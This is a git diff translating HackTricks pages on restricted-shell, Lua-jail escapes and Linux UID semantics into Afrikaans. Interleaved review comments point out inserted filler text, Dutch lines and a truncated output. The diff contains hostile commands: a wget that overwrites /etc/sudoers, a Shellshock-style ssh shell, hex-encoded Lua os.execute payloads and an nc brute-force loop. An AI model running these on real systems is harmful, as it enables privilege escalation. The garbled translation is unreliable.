```bash :set shell=/bin/sh :shell ``` +### Skep skrip -### Create script - -Check if you can create an executable file with _/bin/bash_ as content - +Kyk of jy 'n uitvoerbare lêer met _/bin/bash_ as inhoud kan skep ```bash red /bin/bash > w wx/path #Write /bin/bash in a writable and executable path ``` +### Kry bash vanaf SSH -### Get bash from SSH - -If you are accessing via ssh you can use this trick to execute a bash shell: - +As jy toegang verkry via ssh, kan jy hierdie truuk gebruik om 'n bash-skulp te hardloop: ```bash ssh -t user@ bash # Get directly an interactive shell ssh user@ -t "bash --noprofile -i" ssh user@ -t "() { :; }; sh -i " ``` - -### Declare - +### Verklaar ```bash declare -n PATH; export PATH=/bin;bash -i - + BASH_CMDS[shell]=/bin/bash;shell -i ``` - ### Wget -You can overwrite for example sudoers file - +Jy kan byvoorbeeld die sudoers-lêer oorskryf. ```bash wget http://127.0.0.1:8080/sudoers -O /etc/sudoers ``` - -### Other tricks +### Ander truuks [**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\ [https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells\*\*]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ [https://gtfobins.github.io](https://gtfobins.github.io/\*\*]\(https/gtfobins.github.io)\ -**It could also be interesting the page:** +**Dit kan ook interessant wees die bladsy:** {% content-ref url="../useful-linux-commands/bypass-bash-restrictions.md" %} [bypass-bash-restrictions.md](../useful-linux-commands/bypass-bash-restrictions.md) {% endcontent-ref %} -## Python Jails +## Python Tronke -Tricks about escaping from python jails in the following page: +Truuks oor ontsnapping uit python tronke op die volgende bladsy: {% content-ref 
url="../../generic-methodologies-and-resources/python/bypass-python-sandboxes/" %} [bypass-python-sandboxes](../../generic-methodologies-and-resources/python/bypass-python-sandboxes/) {% endcontent-ref %} -## Lua Jails +## Lua Tronke -In this page you can find the global functions you have access to inside lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base) - -**Eval with command execution:** +Op hierdie bladsy kan jy die globale funksies vind waarop jy toegang het binne lua: [https://www.gammon.com.au/scripts/doc.php?general=lua\_base](https://www.gammon.com.au/scripts/doc.php?general=lua\_base) +**Eval met opdrag uitvoering:** ```bash load(string.char(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))() ``` - -Some tricks to **call functions of a library without using dots**: - +Sommige truuks om **funksies van 'n biblioteek te roep sonder om punte te gebruik**: ```bash print(string.char(0x41, 0x42)) print(rawget(string, "char")(0x41, 0x42)) ``` - -Enumerate functions of a library: - +Enumerasie van funksies van 'n biblioteek: ```bash for k,v in pairs(string) do print(k,v) end ``` - -Note that every time you execute the previous one liner in a **different lua environment the order of the functions change**. Therefore if you need to execute one specific function you can perform a brute force attack loading different lua environments and calling the first function of le library: - +Let wel, elke keer as jy die vorige een-regel kode in 'n **verskillende lua-omgewing uitvoer, verander die volgorde van die funksies**. 
Daarom, as jy 'n spesifieke funksie wil uitvoer, kan jy 'n brute force-aanval uitvoer deur verskillende lua-omgewings te laai en die eerste funksie van die le-biblioteek aan te roep: ```bash -#In this scenario you could BF the victim that is generating a new lua environment +#In this scenario you could BF the victim that is generating a new lua environment #for every interaction with the following line and when you are lucky #the char function is going to be executed for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end 
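Review bot: the `### Gebruik van vim` section in the `@@ -187,105` hunk now contains material with no counterpart on the `-` side of the diff: a paragraph beginning `Vim is 'n kragtige teksredigeerder`, a new `bash` fence containing only `vim`, a three-step list and a closing sentence, after which the original `:set shell=/bin/sh` / `:shell` block still follows, so the instructions are duplicated. Drop the generated text so the section matches the source (heading plus the original code block). The inserted text also misspells "privilege escalation" as `priviligie-escalasie` twice. Separately, `die eerste funksie van die le-biblioteek` carries the source typo "le library" into the translation and should read "die biblioteek".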
@@ -294,27 +281,24 @@ for k,chr in pairs(string) do print(chr(0x6f,0x73,0x2e,0x65,0x78)) end #and "char" from string library, and the use both to execute a command for i in seq 1000; do echo "for k1,chr in pairs(string) do for k2,exec in pairs(os) do print(k1,k2) print(exec(chr(0x6f,0x73,0x2e,0x65,0x78,0x65,0x63,0x75,0x74,0x65,0x28,0x27,0x6c,0x73,0x27,0x29))) break end break end" | nc 10.10.10.10 10006 | grep -A5 "Code: char"; done ``` - -**Get interactive lua shell**: If you are inside a limited lua shell you can get a new lua shell (and hopefully unlimited) calling: - +**Kry interaktiewe lua-skaal**: As jy binne 'n beperkte lua-skaal is, kan jy 'n nuwe lua-skaal (en hopelik onbeperkte) kry deur die volgende te roep: ```bash debug.debug() ``` +## Verwysings -## References - -* [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Slides: [https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)) +* [https://www.youtube.com/watch?v=UO618TeyCWo](https://www.youtube.com/watch?v=UO618TeyCWo) (Dia's: [https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf))
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/linux-hardening/privilege-escalation/euid-ruid-suid.md b/linux-hardening/privilege-escalation/euid-ruid-suid.md index 78f705015..874ec5957 100644 --- a/linux-hardening/privilege-escalation/euid-ruid-suid.md +++ b/linux-hardening/privilege-escalation/euid-ruid-suid.md @@ -2,86 +2,105 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-### User Identification Variables +### Gebruikersidentifikasie Veranderlikes -- **`ruid`**: The **real user ID** denotes the user who initiated the process. -- **`euid`**: Known as the **effective user ID**, it represents the user identity utilized by the system to ascertain process privileges. Generally, `euid` mirrors `ruid`, barring instances like a SetUID binary execution, where `euid` assumes the file owner's identity, thus granting specific operational permissions. -- **`suid`**: This **saved user ID** is pivotal when a high-privilege process (typically running as root) needs to temporarily relinquish its privileges to perform certain tasks, only to later reclaim its initial elevated status. +- **`ruid`**: Die **werklike gebruikers-ID** dui die gebruiker aan wat die proses geïnisieer het. +- **`euid`**: Bekend as die **effektiewe gebruikers-ID**, verteenwoordig dit die gebruikersidentiteit wat deur die stelsel gebruik word om prosesbevoegdhede te bepaal. Gewoonlik weerspieël `euid` `ruid`, behalwe in gevalle soos 'n SetUID-binêre uitvoering, waar `euid` die identiteit van die lêereienaar aanneem en dus spesifieke bedryfsbevoegdhede verleen. +- **`suid`**: Hierdie **gebergde gebruikers-ID** is van kardinale belang wanneer 'n hoë-bevoegdheidsproses (gewoonlik as root uitgevoer) tydelik sy bevoegdhede moet opgee om sekere take uit te voer, slegs om later sy oorspronklike verhoogde status te herwin. -#### Important Note -A process not operating under root can only modify its `euid` to match the current `ruid`, `euid`, or `suid`. +#### Belangrike Nota +'n Proses wat nie as root werk nie, kan slegs sy `euid` wysig om ooreen te stem met die huidige `ruid`, `euid` of `suid`. -### Understanding set*uid Functions +### Begrip van set*uid Funksies -- **`setuid`**: Contrary to initial assumptions, `setuid` primarily modifies `euid` rather than `ruid`. 
Specifically, for privileged processes, it aligns `ruid`, `euid`, and `suid` with the specified user, often root, effectively solidifying these IDs due to the overriding `suid`. Detailed insights can be found in the [setuid man page](https://man7.org/linux/man-pages/man2/setuid.2.html). -- **`setreuid`** and **`setresuid`**: These functions allow for the nuanced adjustment of `ruid`, `euid`, and `suid`. However, their capabilities are contingent on the process's privilege level. For non-root processes, modifications are restricted to the current values of `ruid`, `euid`, and `suid`. In contrast, root processes or those with `CAP_SETUID` capability can assign arbitrary values to these IDs. More information can be gleaned from the [setresuid man page](https://man7.org/linux/man-pages/man2/setresuid.2.html) and the [setreuid man page](https://man7.org/linux/man-pages/man2/setreuid.2.html). +- **`setuid`**: In teenstelling met aanvanklike aannames, wysig `setuid` hoofsaaklik `euid` eerder as `ruid`. Spesifiek vir bevoorregte prosesse stem dit `ruid`, `euid` en `suid` af op die gespesifiseerde gebruiker, dikwels root, en versterk sodoende hierdie ID's as gevolg van die oorskrywing van `suid`. Gedetailleerde insigte is beskikbaar in die [setuid man-bladsy](https://man7.org/linux/man-pages/man2/setuid.2.html). +- **`setreuid`** en **`setresuid`**: Hierdie funksies maak die fynafstelling van `ruid`, `euid` en `suid` moontlik. Hul vermoëns is egter afhanklik van die bevoorregtingsvlak van die proses. Vir nie-root prosesse is wysigings beperk tot die huidige waardes van `ruid`, `euid` en `suid`. Daarenteen kan rootprosesse of dié met die `CAP_SETUID`-vermoë arbitêre waardes aan hierdie ID's toewys. Meer inligting is beskikbaar in die [setresuid man-bladsy](https://man7.org/linux/man-pages/man2/setresuid.2.html) en die [setreuid man-bladsy](https://man7.org/linux/man-pages/man2/setreuid.2.html). 
-These functionalities are designed not as a security mechanism but to facilitate the intended operational flow, such as when a program adopts another user's identity by altering its effective user ID. +Hierdie funksionaliteite is nie ontwerp as 'n sekuriteitsmeganisme nie, maar om die bedoelde bedryfsvloei te fasiliteer, soos wanneer 'n program 'n ander gebruiker se identiteit aanneem deur sy effektiewe gebruikers-ID te verander. -Notably, while `setuid` might be a common go-to for privilege elevation to root (since it aligns all IDs to root), differentiating between these functions is crucial for understanding and manipulating user ID behaviors in varying scenarios. +Dit is veral belangrik om te onderskei tussen hierdie funksies om gebruikers-ID-gedrag in verskillende scenario's te verstaan en te manipuleer, alhoewel `setuid` dikwels gebruik word vir bevoorregte verhoging na root (aangesien dit alle ID's op root afstem). -### Program Execution Mechanisms in Linux +### Programuitvoeringsmeganismes in Linux -#### **`execve` System Call** -- **Functionality**: `execve` initiates a program, determined by the first argument. It takes two array arguments, `argv` for arguments and `envp` for the environment. -- **Behavior**: It retains the memory space of the caller but refreshes the stack, heap, and data segments. The program's code is replaced by the new program. -- **User ID Preservation**: - - `ruid`, `euid`, and supplementary group IDs remain unaltered. - - `euid` might have nuanced changes if the new program has the SetUID bit set. - - `suid` gets updated from `euid` post-execution. -- **Documentation**: Detailed information can be found on the [`execve` man page](https://man7.org/linux/man-pages/man2/execve.2.html). +#### **`execve`-Stelseloproep** +- **Funksionaliteit**: `execve` inisieer 'n program wat bepaal word deur die eerste argument. Dit neem twee reeksargumente, `argv` vir argumente en `envp` vir die omgewing. 
+- **Gedrag**: Dit behou die geheue van die oproeper, maar verfris die stapel, heap en data-segmente. Die kode van die program word vervang deur die nuwe program. +- **Behoud van Gebruikers-ID**: +- `ruid`, `euid` en aanvullende groep-ID's bly onveranderd. +- `euid` kan subtiel verander as die nuwe program die SetUID-bit ingestel het. +- `suid` word na uitvoering van `euid` opgedateer. +- **Dokumentasie**: Gedetailleerde inligting is beskikbaar op die [`execve` man-bladsy](https://man7.org/linux/man-pages/man2/execve.2.html). -#### **`system` Function** -- **Functionality**: Unlike `execve`, `system` creates a child process using `fork` and executes a command within that child process using `execl`. -- **Command Execution**: Executes the command via `sh` with `execl("/bin/sh", "sh", "-c", command, (char *) NULL);`. -- **Behavior**: As `execl` is a form of `execve`, it operates similarly but in the context of a new child process. -- **Documentation**: Further insights can be obtained from the [`system` man page](https://man7.org/linux/man-pages/man3/system.3.html). +#### **`system`-Funksie** +- **Funksionaliteit**: In teenstelling met `execve` skep `system` 'n kinderproses deur `fork` te gebruik en voer 'n opdrag binne daardie kinderproses uit met behulp van `execl`. +- **Opdraguitvoering**: Voer die opdrag uit via `sh` met `execl("/bin/sh", "sh", "-c", opdrag, (char *) NULL);`. +- **Gedrag**: Aangesien `execl` 'n vorm van `execve` is, werk dit op 'n soortgelyke manier, maar in die konteks van 'n nuwe kinderproses. +- **Dokumentasie**: Verdere insigte kan verkry word uit die [`system` man-bladsy](https://man7.org/linux/man-pages/man3/system.3.html). -#### **Behavior of `bash` and `sh` with SUID** +#### **Gedrag van `bash` en `sh` met SUID** - **`bash`**: - - Has a `-p` option influencing how `euid` and `ruid` are treated. - - Without `-p`, `bash` sets `euid` to `ruid` if they initially differ. - - With `-p`, the initial `euid` is preserved. 
- - More details can be found on the [`bash` man page](https://linux.die.net/man/1/bash). +- Het 'n `-p`-opsie wat beïnvloed hoe `euid` en `ruid` hanteer word. +- Sonder `-p` stel `bash` `euid` in op `ruid` as hulle aanvanklik verskil. +- Met `-p` word die aanvanklike `euid` behou. +- Meer besonderhede is beskikbaar op die [`bash` man-bladsy](https://linux.die.net/man/1/bash). - **`sh`**: - - Does not possess a mechanism similar to `-p` in `bash`. - - The behavior concerning user IDs is not explicitly mentioned, except under the `-i` option, emphasizing the preservation of `euid` and `ruid` equality. - - Additional information is available on the [`sh` man page](https://man7.org/linux/man-pages/man1/sh.1p.html). +- Besit nie 'n meganisme soortgelyk aan `-p` in `bash` nie. +- Die gedrag met betrekking tot gebruikers-ID's word nie uitdruklik genoem nie, behalwe onder die `-i`-opsie, wat beklemtoon dat `euid` en `ruid` gelyk bly. +- Addisionele inligting is beskikbaar op die [`sh` man-bladsy](https://man7.org/linux/man-pages/man1/sh.1p.html). -These mechanisms, distinct in their operation, offer a versatile range of options for executing and transitioning between programs, with specific nuances in how user IDs are managed and preserved. +Hierdie meganismes, wat verskil in hul werking, bied 'n veelsydige reeks opsies vir die uitvoering en oorgang tussen programme, met spesifieke subtiliteite in hoe gebruikers-ID's bestuur en behou word. 
-### Testing User ID Behaviors in Executions +### Toetsing van Gebruikers-ID-Gedrag in Uitvoerings -Examples taken from https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, check it for further information +Voorbeelde geneem vanaf https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail, kyk dit vir verdere inligting -#### Case 1: Using `setuid` with `system` +#### Geval 1: Gebruik van `setuid` met `system` -**Objective**: Understanding the effect of `setuid` in combination with `system` and `bash` as `sh`. +**Doel**: Begrip van die effek van `setuid` in kombinasie met `system` en `bash` as `sh`. -**C Code**: +**C-kode**: ```c #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - system("id"); - return 0; +setuid(1000); +system("id"); +return 0; } ``` +**Samelewing en Toestemmings:** -**Compilation and Permissions:** +Wanneer jy 'n program op Linux samestel, word 'n uitvoerbare lêer geskep wat die program se kode bevat. Hierdie uitvoerbare lêer het spesifieke toestemmings wat bepaal wie die program kan uitvoer, wysig of lees. + +Die toestemmings van 'n lêer kan gesien word deur die `ls -l` opdrag uit te voer. Die uitset sal iets soos die volgende wees: + +``` +-rwxr-xr-x 1 user group 12345 Jan 1 00:00 program +``` + +Die eerste karakter in die uitset (`-` in hierdie geval) dui aan dat dit 'n lêer is. As dit 'n `d` was, sou dit 'n gids wees. Die volgende drie karakters (`rwx`) dui die toestemmings van die eienaar van die lêer aan, die volgende drie karakters (`r-x`) dui die toestemmings van die groep aan, en die laaste drie karakters (`r-x`) dui die toestemmings van ander gebruikers aan. + +Elke karakter in die toestemmingsreeks verteenwoordig 'n spesifieke toestemming: + +- `r` dui aan dat die lêer gelees kan word. +- `w` dui aan dat die lêer gewysig kan word. +- `x` dui aan dat die lêer uitgevoer kan word. + +Om die toestemmings van 'n lêer te verander, kan die `chmod` opdrag gebruik word. 
Byvoorbeeld, `chmod +x program` sal die uitvoerbare toestemming aan die lêer toevoeg. + +Dit is belangrik om die toestemmings van jou lêers korrek te konfigureer om die veiligheid van jou Linux-stelsel te verseker. ```bash oxdf@hacky$ gcc a.c -o /mnt/nfsshare/a; oxdf@hacky$ chmod 4755 /mnt/nfsshare/a 
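Review bot: this hunk inserts content that does not exist in the English source. `**Compilation and Permissions:**` became `**Samelewing en Toestemmings:**` ("Samelewing" means society; "Kompilering en Toestemmings" is the intended sense), and between that label and the `gcc a.c -o /mnt/nfsshare/a; chmod 4755` block about a dozen new lines were added that explain `ls -l` output (`-rwxr-xr-x 1 user group 12345 Jan 1 00:00 program`), the `r`/`w`/`x` bits and `chmod +x program`. That text is translator filler, not a translation, and it is misleading at this spot: the test case depends on `chmod 4755` setting the SUID bit, and the inserted paragraph recommends plain `chmod +x`. Drop everything between the label and the `gcc` block and keep only the corrected label. Two smaller regressions in the same hunk: the nested bullets under `Behoud van Gebruikers-ID` and under `**`bash`**:` / `**`sh`**:` lost their two-space indent, so they now render as siblings of the parent item instead of sub-points, and the C bodies lost their indentation (`+setuid(1000);`), which should be restored to match the source listing.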
@@ -91,133 +110,136 @@ oxdf@hacky$ chmod 4755 /mnt/nfsshare/a bash-4.2$ $ ./a uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** +* `ruid` en `euid` begin as 99 (niemand) en 1000 (frank) onderskeidelik. +* `setuid` pas beide aan na 1000. +* `system` voer `/bin/bash -c id` uit as gevolg van die simboliese skakel van sh na bash. +* `bash`, sonder `-p`, pas `euid` aan om ooreen te stem met `ruid`, wat beteken dat beide 99 (niemand) is. -* `ruid` and `euid` start as 99 (nobody) and 1000 (frank) respectively. -* `setuid` aligns both to 1000. -* `system` executes `/bin/bash -c id` due to the symlink from sh to bash. -* `bash`, without `-p`, adjusts `euid` to match `ruid`, resulting in both being 99 (nobody). +#### Geval 2: Gebruik van setreuid met system -#### Case 2: Using setreuid with system - -**C Code**: +**C-kode**: ```c #define _GNU_SOURCE #include #include int main(void) { - setreuid(1000, 1000); - system("id"); - return 0; +setreuid(1000, 1000); +system("id"); +return 0; } ``` +**Samelewing en Toestemmings:** -**Compilation and Permissions:** +Wanneer jy 'n program op Linux samestel, word 'n uitvoerbare lêer geskep wat die program se kode bevat. Hierdie uitvoerbare lêer het spesifieke toestemmings wat bepaal wie die program kan uitvoer, wysig of lees. + +Die toestemmings van 'n lêer kan gesien word deur die `ls -l` opdrag uit te voer. Die uitset sal iets soos die volgende wees: + +``` +-rwxr-xr-x 1 user group 12345 Jan 1 00:00 program +``` + +Die eerste karakter in die uitset (`-` in hierdie geval) dui aan dat dit 'n lêer is. As dit 'n `d` was, sou dit 'n gids wees. Die volgende drie karakters (`rwx`) dui die toestemmings van die eienaar van die lêer aan, die volgende drie karakters (`r-x`) dui die toestemmings van die groep aan, en die laaste drie karakters (`r-x`) dui die toestemmings van ander gebruikers aan. 
+ +Elke karakter in die toestemmingsreeks verteenwoordig 'n spesifieke toestemming: + +- `r` dui aan dat die lêer gelees kan word. +- `w` dui aan dat die lêer gewysig kan word. +- `x` dui aan dat die lêer uitgevoer kan word. + +Om die toestemmings van 'n lêer te verander, kan die `chmod` opdrag gebruik word. Byvoorbeeld, `chmod +x program` sal die uitvoerbare toestemming aan die lêer toevoeg. + +Dit is belangrik om die toestemmings van jou lêers korrek te konfigureer om die veiligheid van jou Linux-stelsel te verseker. ```bash oxdf@hacky$ gcc b.c -o /mnt/nfsshare/b; chmod 4755 /mnt/nfsshare/b ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./b uid=1000(frank) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* `setreuid` sets both ruid and euid to 1000. -* `system` invokes bash, which maintains the user IDs due to their equality, effectively operating as frank. - -#### Case 3: Using setuid with execve -Objective: Exploring the interaction between setuid and execve. +* `setreuid` stel beide ruid en euid in op 1000. +* `system` roep bash aan, wat de gebruikers-ID's behoudt vanwege hun gelijkheid, waardoor het effectief werkt als frank. +#### Geval 3: Gebruik van setuid met execve +Doel: Verkenning van de interactie tussen setuid en execve. ```bash #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - execve("/usr/bin/id", NULL, NULL); - return 0; +setuid(1000); +execve("/usr/bin/id", NULL, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./c uid=99(nobody) gid=99(nobody) euid=1000(frank) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* `ruid` remains 99, but euid is set to 1000, in line with setuid's effect. 
- -**C Code Example 2 (Calling Bash):** +* `ruid` bly 99, maar `euid` word ingestel op 1000, in lyn met die effek van `setuid`. +**C-kode-voorbeeld 2 (Bash aanroep):** ```bash #define _GNU_SOURCE #include #include int main(void) { - setuid(1000); - execve("/bin/bash", NULL, NULL); - return 0; +setuid(1000); +execve("/bin/bash", NULL, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./d bash-4.2$ $ id uid=99(nobody) gid=99(nobody) groups=99(nobody) context=system_u:system_r:unconfined_service_t:s0 ``` +**Ontleding:** -**Analysis:** - -* Although `euid` is set to 1000 by `setuid`, `bash` resets euid to `ruid` (99) due to the absence of `-p`. - -**C Code Example 3 (Using bash -p):** +* Alhoewel `euid` deur `setuid` na 1000 ingestel word, stel `bash` `euid` terug na `ruid` (99) as gevolg van die afwesigheid van `-p`. +**C-kode-voorbeeld 3 (Met behulp van bash -p):** ```bash #define _GNU_SOURCE #include #include int main(void) { - char *const paramList[10] = {"/bin/bash", "-p", NULL}; - setuid(1000); - execve(paramList[0], paramList, NULL); - return 0; +char *const paramList[10] = {"/bin/bash", "-p", NULL}; +setuid(1000); +execve(paramList[0], paramList, NULL); +return 0; } ``` - -**Execution and Result:** - +**Uitvoering en Resultaat:** ```bash bash-4.2$ $ ./e bash-4.2$ $ id uid=99(nobody) gid=99(nobody) euid=100 ``` - -## References +## Verwysings * [https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail](https://0xdf.gitlab.io/2022/05/31/setuid-rabbithole.html#testing-on-jail)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
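Review bot: the same fabricated `**Samelewing en Toestemmings:**` block (the `ls -l` / `chmod +x program` explanation) is inserted again before the `gcc b.c -o /mnt/nfsshare/b` line in Case 2; remove it for the reason given on the previous hunk. This hunk also mixes languages: `* `system` roep bash aan, wat de gebruikers-ID's behoudt vanwege hun gelijkheid, waardoor het effectief werkt als frank.` and `Doel: Verkenning van de interactie tussen setuid en execve.` are Dutch, not Afrikaans. Suggested: "wat die gebruikers-ID's behou omdat hulle gelyk is, en dus effektief as frank werk" and "Doel: Verkenning van die interaksie tussen setuid en execve." The `#### Geval 3` heading is now glued to the preceding list item with no blank line, and the C bodies again lost their indentation. Not introduced by this patch but worth fixing while here: the three Case 3 listings are fenced as ```bash although they are C, and the last result line is cut off at `euid=100`.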
diff --git a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md index d5eb7fda1..6105d0cdf 100644 --- a/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md @@ -1,25 +1,24 @@ -# Interesting Groups - Linux Privesc +# Interessante Groepe - Linux Privesc
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy 